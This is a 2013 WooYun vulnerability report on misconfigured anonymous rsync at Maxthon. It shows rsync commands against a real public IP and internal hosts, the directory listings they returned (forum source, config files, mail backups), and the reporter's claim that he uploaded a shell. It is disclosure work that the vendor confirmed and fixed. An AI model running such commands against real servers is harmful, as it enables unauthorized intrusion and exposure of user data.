当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039755

漏洞标题:傲游网某服务配置不当导致内网沦陷可导致两百万用户信息泄露

相关厂商:傲游

漏洞作者: 想要减肥的胖纸

提交时间:2013-10-15 09:06

修复时间:2013-11-29 09:07

公开时间:2013-11-29 09:07

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-15: 细节已通知厂商并且等待厂商处理中
2013-10-15: 厂商已经确认,细节仅向厂商公开
2013-10-25: 细节向核心白帽子及相关领域专家公开
2013-11-04: 细节向普通白帽子公开
2013-11-14: 细节向实习白帽子公开
2013-11-29: 细节向公众公开

简要描述:

不知道会不会和别人9月27号提交的那个重复,今天我又测试了下,问题还存在应该不会是之前的那个。

详细说明:

rsync配置不当,直接传shell

HellentekiMacBook-Pro:tools Hellen$ rsync 60.28.220.72::bbs_glusterfs
drwxrwxr-x        8192 2013/05/08 18:49:43 .
drwxrwxrwx        8192 2013/10/01 00:08:27 attachments
drwxr-xr-x        8192 2012/09/04 05:38:21 forumdata
drwxrwxrwx        8192 2012/09/01 06:09:59 poll
HellentekiMacBook-Pro:tools Hellen$


直接得到shell

QQ20131015-27@2x.png

漏洞证明:

百万的用户信息啊。。。。

QQ20131015-28@2x.png


内网用rsync备份员工邮件··我真是懒得看了,不然肯定有收获

[/data/html/bbs.mx/forumdata/cache/]$ rsync 192.168.0.12::mail_data
drwxr-xr-x        4096 2012/08/30 19:14:40 .
drwx------        4096 2012/09/04 22:22:46 domains


内网各种rsync匿名访问

[/data/html/bbs.mx/forumdata/cache/]$ rsync 192.168.0.39::bbs
drwxrwxr-x        4096 2012/09/04 05:13:03 .
-rwxrwxr-x        4303 2009/09/15 13:09:41 admincp.php
-rwxrwxr-x        8235 2009/09/15 13:24:02 ajax.php
-rwxrwxr-x        1534 2009/09/15 13:09:41 announcement.php
-rwxrwxr-x        8324 2009/09/15 13:09:41 attachment.php
lrwxrwxrwx          24 2012/09/04 05:12:51 attachments
-rw-r--r--     2796002 2011/03/22 18:22:38 bbs-trunk.zip
-rwxrwxr-x        1953 2009/09/15 13:09:41 campaign.php
-rwxr-xr-x        4014 2012/08/14 10:54:26 config.inc.php
-rwxrwxr-x         106 2009/09/02 10:02:47 crossdomain.xml
-rwxrwxr-x      121996 2009/09/15 13:09:41 d60to70.php.tmp.bak
-rwxrwxr-x         147 2009/09/15 13:09:41 discuz_version.php
-rwxrwxr-x        8079 2009/09/15 13:09:41 eccredit.php
-rwxrwxr-x        4053 2009/09/15 13:09:41 faq.php
-rwxrwxrwx        1150 2011/03/21 17:10:27 favicon.ico
lrwxrwxrwx          21 2012/09/04 05:13:03 forumdata
-rwxrwxr-x       17463 2009/09/15 13:09:41 forumdisplay.php
-rwxrwxr-x        1260 2009/09/15 13:09:41 frame.php
-rwxrwxr-x       10032 2009/09/22 18:05:00 index.php
-rwxrwxr-x        4900 2009/09/15 13:09:41 invite.php
-rwxrwxr-x        1546 2009/09/15 13:09:41 leftmenu.php
-rwxrwxr-x       20227 2011/11/25 15:13:12 logging.php
-rwxrwxr-x       20611 2009/09/15 13:09:41 magic.php
-rwxrwxr-x        3302 2009/09/15 13:09:41 medal.php
-rwxrwxr-x       12943 2009/09/15 13:09:41 member.php
-rwxrwxr-x       37102 2009/09/15 13:09:41 memcp.php
-rwxrwxr-x       42767 2009/09/15 13:09:41 misc.php
-rwxrwxr-x        5603 2009/09/15 13:09:41 modcp.php
-rwxrwxr-x       32143 2009/11/26 18:37:32 my.php
-rwxrwxr-x         906 2009/09/15 13:09:41 plugin.php
-rwxrwxr-x       12698 2009/10/10 09:38:38 pm.php
-rwxrwxr-x       11586 2009/09/16 11:50:17 post.php
-rwxrwxr-x        3464 2009/09/15 13:09:41 redirect.php
-rwxrwxr-x       12427 2012/08/10 10:47:01 register.php
-rwxrwxr-x        3434 2009/09/15 13:09:41 relatekw.php
-rwxrwxr-x        5688 2009/09/15 13:09:41 relatethread.php
-rwxrwxr-x        8419 2009/10/10 16:43:16 reusername.php
-rwxrwxr-x         721 2009/09/02 10:02:47 robots.txt
-rwxrwxr-x        5898 2010/04/12 10:51:42 rss.php
-rwxrwxr-x       10227 2009/09/15 13:09:41 search.php
-rwxrwxr-x        2038 2009/09/15 13:09:41 seccode.php
-rwxrwxr-x        3521 2009/09/15 13:09:41 sitemap.php
-rwxrwxr-x        7688 2009/09/15 13:09:41 space.php
-rwxrwxr-x       38482 2009/10/21 13:25:32 stats.php
-rwxrwxr-x        5962 2009/09/15 13:09:41 tag.php
-rwxrwxr-x       16187 2009/09/15 13:09:41 task.php
-rwxrwxr-x          17 2009/10/23 14:42:20 test.php
-rwxrwxr-x        1044 2009/09/15 13:09:41 topic.php
-rwxrwxr-x       25242 2009/09/15 13:09:41 topicadmin.php
-rwxrwxr-x        9795 2009/09/15 13:09:41 trade.php
-rwxrwxr-x        1010 2009/09/15 13:09:41 video.php
-rwxrwxr-x       30266 2012/09/26 13:33:33 viewthread.php
drwxrwxr-x        4096 2011/03/22 18:17:44 __MACOSX
drwxrwxr-x        4096 2009/10/29 16:23:22 admin
drwxrwxr-x        4096 2009/09/27 21:45:46 api
drwxrwxr-x        4096 2009/09/27 21:45:46 archiver
drwxrwxr-x        4096 2009/09/27 16:32:05 attachments.local
drwxr-xr-x        4096 2011/03/22 18:23:18 css
drwxrwxr-x        4096 2009/09/27 21:45:46 forumdata.local
drwxrwxr-x        4096 2011/03/22 18:23:24 images
drwxrwxr-x        4096 2009/10/19 18:59:42 include
drwxrwxr-x        4096 2009/09/27 21:45:46 ipdata
drwxrwxr-x        4096 2011/05/25 14:39:12 maxthon
drwxrwxr-x        4096 2009/09/27 21:45:46 modcp
drwxrwxr-x        4096 2009/09/27 21:45:46 plugins
drwxr-xr-x        4096 2012/09/03 18:51:03 poll
drwxrwxr-x        4096 2011/03/22 18:23:30 templates
drwxrwxr-x        4096 2009/09/27 21:45:46 uc_client
drwxrwxr-x        4096 2009/09/27 21:45:46 uc_server
drwxrwxr-x        4096 2009/11/26 14:52:35 update20091128
drwxrwxr-x        4096 2013/09/27 21:26:57 wap


修复方案:

安全从点滴做起。

版权声明:转载请注明来源 想要减肥的胖纸@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-15 10:25

厂商回复:

非常感谢

最新状态:

2013-10-15:已修复. 感谢帮助.